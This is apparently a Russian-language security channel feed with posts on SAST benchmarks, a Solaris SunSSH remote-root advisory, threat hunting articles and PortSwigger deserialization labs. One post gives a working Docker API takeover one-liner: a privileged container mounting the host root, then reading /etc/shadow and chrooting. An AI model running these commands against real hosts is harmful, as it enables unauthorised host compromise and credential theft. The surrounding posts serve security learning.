OpenSSF CVE Benchmark

День назад OpenSSF релизнули проект OpenSSF CVE Benchmark. Основная цель проекта - сравнивать инструменты SAST на реальных кодовых базах, в которых была найдена CVE до и после патча. По сути, это репо, содержащее скрипты, которые запускают на текущий момент ESLint, NodeJSScan и CodeQL против различных open-source проектов на GitHub. Ссылки, версии и уязвимость содержатся в JSON-файлах для каждой CVE (пока что только JavaScript и TypeScript). После запуска сканирования автоматически генерируется сравнение результатов в веб-морде с указанием на ложные срабатывания. В roadmap обещают больше тулов и CVE.

Похожий проект 4 года назад делала команда OWASP. Они написали 2740 test cases на Java и натравили на них различные инструменты SAST, в том числе туда попал DAST - OWASP ZAP. Среди SAST были и коммерческие инструменты. Запустить бенчмарки можно и сейчас на их репо. В отличие от OpenSSF бенчмарки от OWASP содержат непосредственно сам код, а не ссылку на репо.

#sast #dev

Даа, не малый арсенал.

https://habr.com/ru/post/532832/

💥Easy RCE using Docker API on port 2375/tcp

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

#ptswarmTechniques https://t.co/1NKzh1zYkS

https://twitter.com/ptswarm/status/1338477426276511749?s=09

Solaris SunSSH 11.0 x86 - libpam Remote Root

A trivial to reach stack-based buffer overflow is present in libpam on
Solaris. The vulnerable code exists in pamframework.c parseusername() which allocates a fixed size buffer of 512 bytes on the stack and parses usernames into the buffer via modules (authtokget) without bounds checks. This issue can be reached remotely pre-authentication via SunSSH when "keyboard-interactive" is enabled to use PAM based authentication. The vulnerability was discovered being actively exploited by FireEye in the wild and is part of an APT toolkit called "EVILSUN".

Download Exploit

Rly?

Киберполигон бьет рекорды!🥇

The Standoff признан самым массовым соревнованием в области кибербезопасности по версии «Книги рекордов России».

Для любителей TI

В 2020 году библиотека Threat Zone пополнилась крутыми и полезными материалами. До конца декабря мы будем публиковать подборки лучших из них. Надеемся, вы ничего не пропустите😉

Начнем с цикла статей о Threat Hunting, написанных в рамках тренинга Cyber Polygon. Получился полноценный гайд, который поможет разобраться в охоте за угрозами:

• Threat Hunting. Why might you need it — первая статья, которая рассказывает, что необходимо для внедрения этой технологии и откуда охотники за угрозами могут брать идеи для гипотез.

• Threat Hunting в действии — статья, в которой мы на конкретном примере показали, как охотники выдвигают гипотезы и проверяют их для выявления вредоносной активности.

• Threat Hunting. Охота на продвинутые тактики и техники атакующих — заключительный материал цикла, в котором мы взяли пример из второй статьи, «прокачали» злоумышленника и показали, как выявлять более сложные инциденты.

Хех, забавно.

Всем https://root-me.org/, один из лучших ресурсов для новичков!

RLY полезный материал

С наступающим всех, кто это читает!

Крайне рад, что тут собралось много друзей и знакомых. Думаю даже что их тут большинство)
Надеюсь, что этот канальчик, который стал для меня еще одним способом запоминать всякие штучки, которые не оч хорошо укладываются в голове, стал и для вас чем-то полезным или может даже мотивирующим (было бы приятно, если это так).

Лично для меня год стал крайне полезным и успешным (если не смотреть новости и не слушать че творится за окном, то он вообще был идеальным:D). Еще больше новых людей, новых знаний, новых свершений, новых целей.

Надеюсь, что и у всех, кто это читает, было что-то подобное. Главное ребятки, хочу пожелать всем того, чего пожелал бы себе - качайте скилл! А все остальное придет! Хехе;)

Полезная заметка

“Все знают, что хакеры работают только по ночам, поэтому многие годы люди просили PortSwigger реализовать тёмную тему. Когда они это сделали, хакеры повсюду радовались! Но некоторые все еще хотели большего... Пока не появился… Burp Customizer!”

https://github.com/CoreyD97/BurpCustomizer

Because just a dark theme wasn't enough!

Сяп, ims0lo

На эти выходные поставил себе задачу прорешать все задания из [Portswigger Academy](https://portswigger.net/web-security/all-labs), и по результатам марафона хочу поскидывать сюда особенно понравившиеся мне задачки. Особенно понравившиеся - это с интересным материалом, с неизвестными мне техниками, с незатронутыми мной технологиями или с вещами, которые всегда было непросто попрактиковать.

В общем, буду постить сюда с дестяток того, что мне приглянулось.

Сегодня я на 70 процентах, но уже хочется закинуть интересный материал, которому я посвятил сегодняшний вечер.

Это атаки десериализации в #Ruby.

Конкретно, я практиковался на задании: https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-ruby-deserialization-using-a-documented-gadget-chain

И мне ранее не доводилось глубоко погружаться в десер в Ruby, кроме как с атаками десериализации, которые применялись для GitLab, после получения секретного ключа приложения. (Читать тут: https://xakep.ru/2020/05/26/gitlab-exploit/)

Если когда-нибудь столкнетесь с подобной задачей, могу рекомендовать статью, которая, как я понял, и предполагалась для решения данного задания: [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN](https://www.elttam.com/blog/ruby-deserialization/)

Отлично написанная статья, позволяющая легко пройтись по цепочке гаджетов, собранных из стандартных библиотек Ruby (и иногда предустановленных модулей) и понять как устроен десер в рубях, а также разобраться как работает эксплоит в деталях.

Также, по счастливой случайности, сегодня же подвернулась статья, рассказывающая о таком же универсальном эксплоите для Ruby версии 2.x и 3.x: [Universal Deserialisation Gadget for Ruby 2.x-3.x](https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html)

Всем знаний!;)

Еще один неплохой таск для джунов в Portswigger Academy! Это таск на атаки инъекции объектов в #PHP со сбором кастомной цепочки гаджетов на основе доступного кода приложения. В меру интересно и в меру сложно для джуна.

Ссылка на задание: https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-php-deserialization

Таск хорош тем, что дает возможность попрактиковаться в сборке цепочек гаджетов для атак на десериализацию. Таких задачек в CTF встречается не много, а здесь можно на одном примере достаточно ясно понять о чем вообще речь в разговорах про Gadget Chains.

В общем, весьма рекомендую тем, кому кажется, что он уже начал что-то понимать в хакинге веба. Я бы рад повстречать такой таск в первые год-полтора своей работы.

P.S. Аналогичный таск на Custome Gadget Chains в Java оказался совсем не интересным. Да и гаджетов там по сути не было.

#PortSwiggerAcademy #PHP

Ухх. А вот это действительно классный таск на атаки десериализации в PHP. Придется раскрутить чейн, каких вряд ли повстречаешь в жизни.

https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-phar-deserialization-to-deploy-a-custom-gadget-chain

Здесь и десериализация через мета в PHAR архиве, и файлы полиглоты, и custom gadget chain, и еще кое чего припасено.

Не сказать что это сложно, т.к. тут все перед глазами, и главное знать что с этим делать. Но для получения такой практики и опыта, это крайне годный таск. Обязателен к решению если не сталкивались хотя бы с одной из вышеперечисленных техник.

Это круто!

https://lab.wallarm.com/owasp-top-10-2021-proposal-based-on-a-statistical-data/?amp&__twitter_impression=true